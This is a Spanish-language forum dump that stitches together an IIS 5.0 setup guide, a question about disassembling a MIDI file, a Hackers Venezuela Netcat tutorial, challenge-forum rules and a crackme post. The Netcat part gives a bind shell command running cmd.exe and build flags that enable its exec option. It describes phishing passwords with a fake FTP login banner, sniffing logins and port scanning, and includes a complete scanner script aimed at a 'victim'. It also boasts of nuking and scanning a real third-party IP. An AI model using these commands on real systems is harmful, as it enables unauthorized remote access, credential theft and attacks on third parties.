La primera opción de seguridad es el acceso anónimo y la autentificación en el web si pulsamos el botón nos aparece lo que nos muestra la figura 6, a través de esta opción restringiremos el acceso a todos los usuarios excepto el administrador y usuarios permitidos o se lo habilitaremos a todos dando permisos de acceso al usuario anónimo de internet que se llama IUSR_Nombre_de_Maquina (la contraseña de este usuario la genera automáticamente el sistema por lo que no es conveniente tocarla). Debajo del acceso anonimo tenemos los métodos de autentificación, aquí la opción importante es la segunda que si tenemos un web en una intranet con acceso restringido a usuarios registrados con esta opción chequeada los usuarios se validaran automáticamente con la seguridad de windows 2000

Por ultimo tenemos las opciones de seguridad por IP (figura 7) para restringir usuarios según la IP de donde procedan.

Estas opciones que hemos vistos son las más importantes a la hora de configurar un Web Site, existen algunas más que permiten modificar y personalizar más el Sitio Web.

Instalación de nuevos Webs

La creación de nuevos webs es bastante sencilla y una vez has creado uno, crear más es repetir siempre los mismos pasos, que son los siguientes :

1. Crear un nuevo web (figura 8)

Con el botón derecho del mouse pulsamos encima del nombre de la maquina y seleccionamos nuevo web site.

2. Ponerle un nombre para identificarlo en la MMC (figura 9).

3. Asignarle una IP, puerto (por defecto el 80) y un asignarle un Host Header, es decir, asignarle un nombre de dominio (figura 10).

Si trabajamos en un entorno local o de intranet, el Host Header no es necesario ponerlo

4. Asignarle una ruta física en disco (figura 11).

Es decir, asignarle un directorio en disco. Recordemos que el "web por defecto" del IIS se crea en c:\inetpub\wwwroot (ruta que puede cambiarse si se desea). Para no liarnos y tener separados los webs podemos crear un directorio root para contener todos los Webs que queramos crear, asi nuestra ruta nos quedaria c:\intepub\roots\pruebas, siendo pruebas nuestro directorio para esta aplicación web.

5. Seleccionar los permisos de ese web (figura 12).
Los permisos de ejecución de páginas, si ejecuta Scripts, dll o exe o solo páginas asp.

Una vez creado el nuevo web hay que instalar las extensiones de Front Page como se explica en el siguiente punto y configurar el web como esta explicado en el punto anterior.

Directorios virtuales

No existe una definición exacta de Directorio Virtual ,Pero podríamos decir que es un directorio dentro del web, por ejemplo si nuestro web se llama Concurso.com

http://www.depruebas.com

un directorio virtual sería /musica, y se llamaría desde el navegador

http://www.depruebas.com/musica

Este directorio tendría la capacidad de que podríamos trabajar con él desde el Visual Interdev o desde el Front Page como si fuera un Web, creándonos un proyecto solo de este directorio virtual y sin tener que bajarnos todo el web para trabajar.

¿Como creamos un nuevo directorio virtual?

Nos posicionamos con el ratón en el web donde queremos crear el directorio virtual, un click con el botón derecho del ratón y seleccionamos Nuevo -> Directorio virtual y después nada más sencillo que seguir las imagenes de la 19 a la 22.

1.Primero nos pedira un nombre identificativo, recordar que el nombre que pongais aquí es el que saldrá en la URL después del dominio, si el directorio se llama musica, en el navegador se vera http://www.depruebas.com/musica. (figura 19)

2.Seleccionamos una ruta fisica en disco para guardar las páginas que este directorio contendrá. (figura 20)

3.Seleccionamos los permisos y el tipo de páginas y aplicaciones que se ejecutaran desde este directorio. (figura 21)

Una vez creado podemos modificar sus propiedades, si nos posicionamos en el directorio con el ratón, click con el botón derecho del ratón y seleccionamos propiedades sale la ventana que muestra la figura 22. Desde aquí podemos cambiar varias de sus propiedades como la página por defecto, la seguridad del directorio, si queremos que el directorio sea solo para usuarios registrados y algunas opciones más.

¿Como convertimos un directorio existente en directorio virtual?

Nos posicionamos con el ratón en el directorio que queremos cambiar a directorio virtual, un click con el botón derecho del ratón y seleccionamos propiedades y nos aparece la figura 23, aquí tenemos que pulsar el botón create y convertiremos nuestro directorio normal en virtual.

Para eliminarlo, es decir, dejar se ser directorio virtual y pasar a ser directorio normal, pulsamos el botón llamado eliminar, esto no quiere decir que borraremos el contenido del directorio, pulsando este botón el directorio y su contenido seguirán existiendo pero como un directorio normal y corriente sin acceso a él desde un cliente Front Page o Visual Interdev.

Instalación de las extensiones de Front Page

El Web por defecto las trae instaladas por defecto, pero cada vez que creemos un nuevo Web hay que instalarlas aunque no es necesario hacerlo si ese web no va a utilizar Front Page o Visual Interdev y solo se conectaran a el clientes FTP. Como servidor web funcionara igual con o sin la extensiones.

¿Por que instalar las extensiones de Front Page?

Es probable que el administrador de sistemas o la persona responsable del servidor no las utilice o no las necesite pero si no se instalan las extensiones no se podrá tener acceso al web mediante Front Page o mediante Visual Interdev para desarrollar.

Para instalar las extensiones de Front Page hacemos clic con el botón derecho del ratón sobre el nuevo web que hemos creado (figura 14) y seleccionamos Todas las tareas -> Configurar Extensiones de Servidor, a partir de aquí nos van a aparecer una serie de pantallas de ayuda para configurar las extensiones.

1.Creación de los grupos de Windows (figura 15).

Por defecto cuando instalamos las extensiones de Front Page, el IIS nos va a sugerir crear un grupo específico para ese nuevo web pero esto no es aconsejable utilizarlo por lo que deschequearemos esta opción.

No es aconsejable porque esta opción lo que va hacer es crear un grupo de usuarios dentro de la administración de usuarios de Windows 2000 con lo que se nos creará un grupo por cada web que creemos y es muy probable que algunas de estas web no utilicen grupos, ni usuarios validados en el web, es decir, que sea un web para todo el público. Por otro lado, es mas aconsejable ir creando grupos desde el administrador de Windows 2000 y saber que creamos y donde vamos a utilizarlos.

2.Control de Acceso (figura 16).

Aquí daremos permiso a los grupos que administran el web, por defecto es el grupo de administradores el que tiene permisos de administración.

3.Mail Server (figura 17).

Y con esto quedan instaladas las extensiones de Front Page.

Seguridad en IIS 5.0

La seguridad de un Web a través de la MMC viene restringida a poder decirle al web "este web lo pueden ver todos los usuarios, o este web solo lo utilizan los administradores (figura 1), o solo lo ven determinadas IP", esto es asi porque la seguridad del Internet Information Server va asociada a la seguridad de Windows 2000, por lo tanto para permitir y denegar accesos a determinadas partes del web como poder acceder a directorios virtuales o poder enviar ficheros al web se ha de utilizar la seguridad de Windows a través del los grupos y usuarios (figuras 25 y 26).

Supongamos el siguiente escenario de trabajo.

Tenemos un Web con un directorio virtual llamado "musica" que solo queremos que usuarios registros, que ciertos usuarios puedan acceder a él. Lo primero que tendremos que hacer es ir a las propiedades del directorio virtual desde la MMC, click con el botón derecho del ratón y seleccionamos propiedades y la opción Seguridad del Directorio y lo dejamos tal como muestra la figura 24 con lo que conseguiremos que los usuarios anónimos, que no estén identificados en el servidor, no puedan acceder al directorio, pero podrán acceder al resto del web, y a este directorio solo accedan los usuarios validados en el Windows 2000.

Con esta opción chequeada solo conseguimos que los usuarios con permisos de administrador puedan acceder al web para dar permisos de acceso a otros usuarios deberemos ir al explorador de Windows y situarnos en el directorio físico, click con el botón derecho del ratón y seleccionamos la opción de propiedades y ahí la opción seguridad (figura 25). Aquí deberemos añadir o eliminar los usuarios o grupos de usuarios que queramos que tengan acceso al web.

Los usuarios y/o grupos en windows 2000 se crean a través de la opción Computer Management, desde Inicio -> programas -> Computer Management y seleccionando Local Users and Grups (figura 26).

Noviembre 2001
Bajado desde www.softdownload.com.ar
#26
Pues eso, he probado con el Olly a que me desamble (se dice asin no?) un archivo MIDI (*****.mid) pero claro, me dice que no tiene PE header, que no es 32 bit, y que me vaya a la mierd....

El Win32ASM lo desamblaria? O el Sice? Esque me da pereza ponerme estos dos, porque no me solucionaron nada en el pasado...

Supongo que visualizar un midi con un HEX editor si seria posible no?


Salu2
#27
==========================================
Netcat.
Sacandole Provecho a una exelente Utilidad.
por: Kliber.
kliber@hven.com.ve
Hackers Venezuela
==========================================

   Netcat es un pequeño programa creado para uso de los
administradores de redes (y por supuesto para los Hackers) :), este
proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por
Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy
poco se ha escrito sobre este Programita; Principalmente porque la estructura
de sus comandos es poco familiar para el usuario medio. Netcat tiene
infinidad de funciones, aunque se deja que sea el usuario quien las
averigue :P, y en el archivo de ayuda ponen algunos ejemplitos muy
elementales solamente...

        La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la
máquina de windows, cierto poder sobre este protocolo que solo tenía
UNIX,  trabaja con lineas de comandos desde MS-DOS (o desde el
Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre
TCP/IP. El comando principal es nc con su respectiva variable u opción
al mas puro estilio Unix.


        Cabe destacar que la información sobre Netcat y sus usos
especificos es bastante limitada; aunque Hobbit en su documento aclara
muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado
para mas de 1001 vainas...

  Netcat puede   ser encontrado en: http://www.l0pht.com/~weld/netcat


   Netcat en WinX
   ==============
   
Este es el resultado de el comando de ayuda de netcat en una máquina windows

c:>nc -h

connect to somewhere:   nc [-options] hostname port [ports]
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
       -d              detach from console, stealth mode

       -e prog         inbound program to exec [dangerous!!]
       -g gateway      source-routing hop point, up to 8
       -G num          source-routing pointer: 4, 8, 12, ...
       -h              this cruft
       -i secs         delay interval for lines sent, ports scanned
       -l              listen mode, for inbound connects
       -L              listen harder, re-listen on socket close
       -n              numeric-only IP addresses, no DNS
       -o file         hex dump of traffic
       -p port         local port number
       -r              randomize local and remote ports
       -s addr         local source address
       -t              answer TELNET negotiation
       -u              UDP mode
       -v              verbose [use twice to be more verbose]
       -w secs         timeout for connects and final net reads
       -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

 Bien; un analisis rápido de estas variables nos da una idea del
potencial de este pequeño programa y las infinitas posibilidades que nos
ofrece el poder manejar conexiones de una manera tan básica y sencilla:

<------ Opciones de Netcat --------->

-d  (Modo Stealth o encubierto)
   Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.

-e<prog>  (Ejecuta un programa cuando se conecta)
   Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.

-l  (Escuchando conexiones)
   Deja a un puerto abierto en espera de una conexión

-L  (lo mismo que anteriormente pero sigue escuchando aún cuando la
conexión es cerrada)
    Esta opción es incluida en la versión de Weld Pond de L0pth, y
es muy util para seguir escuchando en el puerto, a diferencia de -l
(que la conexión cerrada termina con el proceso de nc) esta opción -L
permite seguir escuchando en el mismo puerto (la rutina de nc -l es
reiniciada).

-n   (Dirección numerica especifica; no hace un DNS Lookup) Netcat tiene la
facultad de resolver nombres de dominio mediante un DNS Lookup, con esta
opción le especificamos que no lo haga, y use solamente direcciones IP.

-o<logfile>  (obtiene un archivo log en Hex de la acción) Genera un Log de
las actividades de netcat en código Hexadecimal.

-p<puerto> (Puerto para pegarse) Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.

-s<ip addr>  (pegarse a un IP especifico) Netcat puede utilizar IP de una red
como fuente local.

-t   (Funciona como un pequeño demonio telnet) Con esta opción le especificas
a netcat que debe realizar negociaciones telnet.

-u  specify UDP (Utilizar Protocolo UDP) Con esta opción le dices a netcat que
trabaje con protocolo UDP en vez de TCP.

-v   (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario, sobre todo para estudiar demonios
en profundidad y observar todos los detalles en un Sniffing.

-w <segundos> (Especifica un tiempo para terminar) Con esta opción le especificas un
tiempo determinado para realizar conexiones .

-r (Genera un Patron Ramdom de puertos locales o remotos) Muy util para evitar
patrones lógicos de Scanning.

-g <gateway> (especificar Gateways) Una de las opciones más interesantes de netcat,
permite utilizar Routers como "puentes" de conexión.

-G <numero> (Especificar puntos de Routing), Con esta opción podemos crear
una cadenaaleatoria de hosts para crear un ruta perdida para tus paquetes
(Spoofing).

-i <segundos> Especifica un intervalo de segundos entre puertos Scaneados.

<------------- Fin de las opciones comentadas ------>


   Netcat en Linux
   ===============

   Netcat en una plataforma como Linux se convierte en una utilidad
muy potente, pudiendo ser utilizado en conjunto con lenguajes de programación
como Perl y C , o bien desde la propia Linea de comandos del poderoso Shell
de Linux mediante Shell Scripts.

   Cabe destacar que distribuciones como RedHat Linux trae junto con
sus paquetes de instalación una versión limitada de netcat; lo mas recomendable
es bajar de la red la versión full de netcat para Linux (Importante: La
versión de netcat para linux viene a prueba de lamers, por lo cual debemos
compilar a netcat con unos flags especiales para poder obtener las opciones
-t y -e (Telnet y Gaping Security Hole) ). Bajas el .tar de netcat y lo
desempaquetas en el directorio de tu preferencia, te ubicas dentro del
directorio de netcat y lo compilas con Make utilizando las siguientes Flags:

[root@DarkStar] #make linux DFLAGS=" -DTELNET -DGAPING_SECURITY_HOLE"


Copias el binario (nc) al directorio /usr/bin , de esta manera podras usar
netcat directamente llamandolo de cualquier parte del Shell, ademas de que
podrás usar los scripts que hagas (o consigas en la red) sin problemas; netcat
trae unos scripts muy interesantes y bien comentados para que los estudies
y comprendas mejor su implementación en scripts, los scripts están en el
directorio donde desempaquetastes netcat en /scripts , los corres como
siempre: ./probe  (o el script que quieras).


   Utilizando Netcat.
   ==================

  Para ilustrar mejor como trabajamos con este programa, lo mejor es
observar ejemplos prácticos y analizar su estructura para poder comprender
mejor como funciona y así poder crear nuestras propias aplicaciones.

Algunas de las cosas que podemos hacer con NetCat son:

        Obtener un Shell rapidamente en una máquina remota usando la
opción -l (Listen) conjuntamente con la opción -e (ejecutar) , cuando el
proggie corre con estas variables y la conexión es realizada, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la conexión a la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

        Este comando dejará a NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a travéz del cliente, ejecutará un Shell (cmd.exe)
la opción -t le dice a NetCat que maneje cualquier negociación que el
cliente pueda esperar....

        Si esta conexión es realizada desde una máquina NT, el shell
correrá los permisos del proceso que han generado a NetCat (Hmmm...) así
que hay que ser muy cuidadosos :)

        La belleza de NetCat es que puede hacer lo mismo en CUALQUIER
puerto :) Puedes dejar a NetCat escuchando en los puertos NETBIOS, que
están probablemente corriendo en la mayoría de las máquinas NT, de esta
manera puedes lograr una conexión a una máquina que esté utilizando
"Filtrado de Puertos" activado en TCP/IP security Network Control Panel,
NT no parece tener ninguna seguridad alrededor de cuales puertos  los
programas de usuarios son permitidos amarrar, esto quiere decir en pocas
palabras, ejecutar comandos y programas que puedan unirse a los Puertos
NETBIOS.


        Como anteriormente se mencionó, puedes utilizar a Netcat para
estudiar diferentes puertos, con la siguiente sintaxis:

c:\>nc -v <IP> <puerto> (puedes añadir otra -v)


        Uno de los puertos mas interesantes a la Hora de Analizar un
Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e
información muy util a la hora de planear un "Brute-Force Attack", este
comandito de Netcat te muestra la Flexibilidad del Proggie en cuestion,
dandote una idea de sus posibilidades:

c:\>nc -v <host> 79 < user.txt > log.txt

        El comando anterior le dice a netcat que se conecte en modo
verbose al Host predeterminado en el puerto 79 (Finger) y envie el
contenido del archivo user.txt (OJO: no he probado esto con una posible
lista de nombre de usuarios al azahar), la respuesta del servicio será
guardada en el archivo log.txt


   Scanner:
   ========

        Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran número de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.

C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

        Pues si; aqui tienen un pequeño y primitivo scanner, se le
pueden añadir puertos escogidos como en el ejemplo anterior o asignarle
un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused  etc...

        Volvemos con la opción -v (verbose) y la Opción -z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.
     

   Sniffer:
   ========

   Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conexiones en cualquier puerto, pudiendo redireccionar todo el
tráfico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]


   Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...

[Aqui viene la conneción...]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connección se va al archivo login.txt]
sent 0, rcvd 42

[La opción -L permite que netcat escuche nuevamente al terminar la conexión,
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...




        El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
    ---------------------

        Ejecutamos a Netcat con la opción o variable -v (verbose)
(doblemente "verbose" por si acaso) ;) esto hará que el resultado de
netcat, sea mostrado directamente en pantalla (a diferencia del archivo
usado por Dr._X) , la opción o variable -L (Listen, and listen again)
nos permitirá dejar escuchando u "oliendo" en determinado puerto aun
cuando la conexión sea interrumpida (listen again), con la variable -p
le indicamos el puerto...

        Al ejecutar a netcat con esa combinación de variables las
opción -v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...


        Realizo desde otra ventana un telnet a localhost (127.0.0.1) en
el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado


        Voilá! un Sniffer en LocalHost!  Jajaja!!!

     

   Detector de Conneciones Sospechosas:
   ====================================

   La posibilidad de dejar a netcat escuchando en determinados puertos,
nos permite crear una especie de "trampa" para un supuesto agresor que utilize
scanners, o herramientas tales como NetBus o BackOrifice en contra de
nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood
y redireccionar su salida hacia la estación agresora en caso de una conexión
no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas
más, Muaahahaha!)  :)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo
real de un dia como cualquier otro en IRC; he aquí el ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338

        Back Orifice utiliza el protocolo UDP para realizar sus
travesuras, realiza la conexión desde un puerto aleatorio (casi siempre
el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una
variante de BO), por eso se utiliza la opción -u (protocolo udp) ,
netcat se queda esperando conexiones UDP en el puerto 31337 (default de
BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a
pantalla el IP y el DNS del agresor...

        Luego un pequeño "Ping of Death" (Nuke) para el transgresor y
le hacen un Scan para ver cuando desaparece B-]

nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--Chao!!! Jeje!!


   Otros usos Miscelaneos:
   =======================

    Puedes utilizar algo de ingienería social para capturar algunos
passwords con netcat, por ejemplo, si una máquina no tiene abierto el
puerto de FTP o de telnet, creas un archivo de texto que solicite el ID
y el Password de la víctima; algo así:

Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter"
LogOn:

Luego redireccionas el archivo hacia la victima:

C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt

        Si el tonto cae... Ahí va tu password, Jeje!! B-] un poco de
imaginación y maña te permitirán encontrar muchas utilidades para
netcat.


   Netcat en Vez de Telnet.
   =======================

   Yo personalmente prefiero usar netcat para realizar connecciones
remotas como alternativa al Telnet. la ventaja de realizar conexiones telnet
desde netcat es que este esconde "algo" sobre tu conexión, lo que lo hace
mas "sigiloso" que telnet, (de ahí por que lo llamaron netcat), Realizando
una conexión "Limpia" en determinado puerto, obviando las negociaciones
comunes de Telnet que pueden confundir al cliente en determinados casos,
como por ejemplo, al utilizar ciertas Backdoors muy conocidas en Unix.

    OJO: algunas máquinas interpretan al cliente de telnet
y asumen el nombre del usuario que lo utiliza, de allí el porqué algunos
servidores solo preguntan por password ; teoricamente netcat no envia
esta información. Por eso, es recomendable acostumbrarse a utilizar netcat
para hacer conexiones remotas:


   c:> nc -v nombre del host 23(o el puerto de tu preferencia)


   Netcat y Programación:
   ======================

   Esta combinación desencadena todo el Poder de Netcat en su máxima
expresión; Tratandose de una herramienta que funciona con lineas de comandos,
su integración con un lenguaje de programación le permite realizar gran
cantidad de tareas, y posibilidades se van descubriendo dia a dia con su
inclusión en nuevos Scripts y Exploits.

   Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten
frustrados porque muchos de los Scripts y Exploits que bajan de la Red
simplemente no les funciona, porque no saben interpretar el Código y por
lo tanto son incapaces de efectuar las modificaciones necesarias para incluir
librerias, paths o utilidades necesarias para su funcionamiento.
(Jódanse ScriptKiddies!!! Jajaja!!)

   Netcat es exelente para implementar exploits remotos, permitiendo
enviar el código a cualquier puerto vulnerable con una simple orden, logrando
ejecutar todos los comandos necesarios para explotar determinados servicios.

   Varios exploits que circulan actualmente en la Red, usan a netcat
como "motor" para manejar las conexiones, si analizamos el código de estos
programas podemos observar un nc por ahí, esto significa que el Proggie en
cuestión necesita una versión correctamente compilada de netcat en el
directorio  /usr/bin . A continuación un pequeño programa realizado por
el Doctor_X de Hven utilizando a netcat:

<---------- Hven Port Scanner!! ------>

# !/bin/bash
# Scanner de Puertos
# By DoctorX 17/04/99  email: d0ct0r_x@bactery.8m.com
# Zona de Bacterias  http://bactery.8m.com
# Hackers de Venezuela http://www.hackhour.com.br/hven
# Este es un shell script hecho por mi para la verificacion de
# conexiones a un host utilizando netcat.

# Declaracion de Variables

export NETCAT=" nc -v -v -w 8 -z "
export RANGO=$2
LOCALHOST=$(uname -n)
export PUERTOS="21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337"
export MEM1="Scanner de Puertos "
export MEM2="by "  
export MEM22="para Hackers Venezuela"
export MEM3="Victima : "
export MEM4="Falta el GateWay para el Source Routing !!!!!!"
export MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
export MEM6="Local Host : $LOCALHOST "
export MEM7="UDP Scan "
export MEM8="http://www.hackhour.com.br/hven"
export re=""
export cl=""
export rojo=""
export email="email:d0ct0r_x@bactery.8m.com"

# Declaracion de Funciones

# Mensaje cuando no se le dan Parametros

function mem() {
local uso="uso  :$0  [opcion]  <host> <gateway>"
local DRX="DoctorX"
echo $MEM1
echo $MEM2   ${rojo}$DRX${cl}  $MEM22
echo $MEM8
echo ${rojo}$uso${cl}
echo "<host>             :IP/HOSTNAME de La Victima jejejeje "
echo "<gateway>          :source-routing , es opcional "
echo "opciones : "
echo "u                  :esta opcion de utiliza para hacer scan udp"
echo "so                 :Determinacion de SO de servidores Web"
echo "r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi" &&
exit ; }

# Mensaje Inicial

function mem2() {
VICTIMA=$1
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3  $VICTIMA
echo $MEM6 ; }

# Mensaje 2

function mem_web() {
mem_web1="Hackers Venezuela"
mem_web2="By"
mem_web3="Victima : "
VICTIMA=$1
mem_web4="Determinacion de SO en Web Servers"
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email
echo $mem_web3 $VICTIMA ;}


# Scan Tcp

function tcp() {
HOST=$1
$NETCAT  $HOST $PUERTOS ; }

# Scan Tcp con Rango

function tcp_rango() {
HOST=$2
RANGO=$1
$NETCAT  $HOST $RANGO ; }

# Scan UDP

function udp() {  
VICTIMA=$1
echo $MEM7
$NETCAT  -u $VICTIMA $PUERTOS ; }

# Scan UDP con gateway

function udp_gateway() {
echo $MEM7
VICTIMA=$2
GATE=$1
NETCAT_GATE="nc -v -v -z -u $VICTIMA -g $GATE "
$NETCAT_GATE $PUERTOS ; }

# Scan con Source Routing

function tcp_gateway() {
GATE=$1
HOST=$2
RANGO=$PUERTOS
echo "Gate : $GATE "  
$NETCAT -g $GATE  $HOST $RANGO ; }

# Advertencia

function  adv() {
local MEM4="Falta el GateWay para el Source Routing !!!!!!"
local MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
echo ${rojo}$MEM4${cl}
echo ${re}${rojo}$MEM5${cl}  ; }

# Determinacion de SO

function web_so() {
NC="nc -w "
HTTPPORT="80"
GET="GET /"
ECHO="/bin/echo"
HEAD="HEAD / HTPP/1.0"
HTTPVARIABLE="Server:"
WEB_SERVER="$1"
LOG="salida.txt"
#CHECKHTTP=( echo $GET  ; sleep 5)| $NETCAT $VICTIMA  80
( echo $HEAD  ; echo ; echo ) | $NC  8 $WEB_SERVER $HTTPPORT | grep $HTTPVARIABLE  | cut -d: -f2  1> $LOG  
cat  $LOG
rm -f $LOG  ;}


# Seleccion de Opcion

case $# in 0 ) mem ;;
          1 ) mem2 $1 ;
              adv  ;
              tcp $1 ;;
          3 ) if [ "$1" != "r" ]; then
                 mem2 $2
                 udp_gateway $3 $2
              else {  mem2 $3
                    adv  
                    tcp_rango $2 $3 ;}
              fi ;;
          2 ) if [ "$1" != "u" ] ; then
                      if [ "$1" != "so" ] ; then
                            {  mem2 $1
                            # adv  
                            tcp_gateway $2 $1 ;}
                      else { mem_web $2
                             web_so $2 ;}
                      fi
               else  { export HOST=$2
                      mem2 $HOST
                      udp $2  
                      exit 0 ;}
               fi ;          
esac


<------- Fin del Hven-Scanner, cortar aquí --------->

        Conclusión:
       ============
   
   Si estudiamos detalladamente las variables, el misterio de
netcat desaparece, viene la parte de la imaginación; ¿Que otras
funciones le podemos asignar? ¿Que mas podría hacer? ; al revisar el
programa que envió Dr._X me dije: "Lógico! Hmmm... Y que tal si hacemos
asi..." ; el hacking no es más que probar nuevas posibilidades, utilizando
el ingenio, los conocimientos acumulados y una dosis bastante fuerte de
imaginación podremos lograr loque queramos.  :)


   Si tienes otras ideas, utilidades, programas o forma innovadora
para utilizar netcat, escribenos un mail, estaré encantado de anexarlo
en este documento....


   Este Documento fue Realizado por Kliber, Agradecimientos especiales
a Doctor_X (Code Freak) :), DarkDeath, y a todos los miembros de nuestra
comunidad por su invaluable Colaboración.

   "Hecho en Venezuela!"

==============================
  kliber@hven.com.ve
  Hackers Venezuela
  "El Conicimiento es Poder!!"
  http://hven.com.ve
==============================    
#28
Bueno, teniendo en cuenta las caracteristicas de este foro, debe haber algunas reglas....

- NO publicar soluciones completas o un "paso a paso" para conseguir pasar el nivel o la prueba, porque se pierde todo el interes de dichas pruebas (tanto las de este foro como las ajenas como izhal, boinasnegras, etc etc)

- Las pistas y demas, deben de ser moderadas, solo se ayudara en caso de que este mas perdiisimo y no tenga ni idea de por donde van los tiros. Si no, solo se le orientara de forma muy leve...

- Todo el que lo desee puede publicar un desafio, prueba, adivinanza, etc etc... pero respetando las condiciones de que se debe pasar por el foro a menudo (para ver las respuestas en sus mensajes privados y para controlar las pistas demasiado gordas, entre otras cosas)

- La mayoria de las veces, las respuestas a un desafio - reto - practica se envian por mensaje privado o por mail, NUNCA SE POSTEAN en publico (salvo que el que ha puesto la prueba especifique lo contrario)

- En estos retos a publicar, lo mas interesantes es que dicho reto se resuelva usando el cerebro, no usando fuerza bruta por ejemplo ni herramientas especificas (es tonteria poner un reto de crackear un hash MD5, lo sacara el que antes lo vea y el que tenga mejor CPU)

- El que ha publicado el reto debe editar su mensaje original para ir incluyendo a los que han resuelto el reto.

Espero que todos respetemos estas reglillas y que hagamos de este subforo un magnifico sitio donde compartir dudas de otros juegos - wargames (izhal, boinasnegras, etc) asi como experimentar con los desafios que propongan los usuarios del foro.

Un saludo.

Rojodos.

Leer tambien Reglas Generales
#29
Bueno, aki os dejo un crackme muy muy sencillote, para que pratiquen los novatos (me incluyo, aunq este ya se resolvio en mi antiguo foro, enviado por el Señor Patata, antes Mek). Pero, para desgracia vuestra  ;D, no todos conocian mi foro.

Poco a poco ire poniendo algunos crackmes mas, para que practiqueis, tengo bastantes. Seguramente el Señor Patata (XD) ponga tb crackmes, que el conoce muchos mas que yo.

Nota: Para los que no lo sepan, un crackme es un programita que tiene una proteccion (o varias) y esta hecho unica y exclusivamente para que sea crackeado y asi aprender las tecnicas de crackeo, salto de protecciones, etc etc.. y le pilleis soltura usando los debuggers, hexs, etc... Se podria traducir como "Crackea-me". Es lo mejor para practicar, porque no haces nada ilegal.

Link del Crackme:
www.iespana.es/rojo2/Crack/Crackmes/crackme.zip

Puede que la descarga a veces no funcione, intentadlo mas tarde, porque es culpa del server de iespana. Utilizad un gestor de descargas si podeis.

Quien lo resuelva (que espero que sean muchos), me manden un mensaje privado, con la solucion. NO POSTEEIS LA SOLUCION EN PUBLICO.

Si tienes alguna duda sobre el crackme, ponla como respuesta a este post.

Usuarios que lo han resuelto:

DYABLO POETA - 23 / 6
KAPLAND - 23 / 6
#30
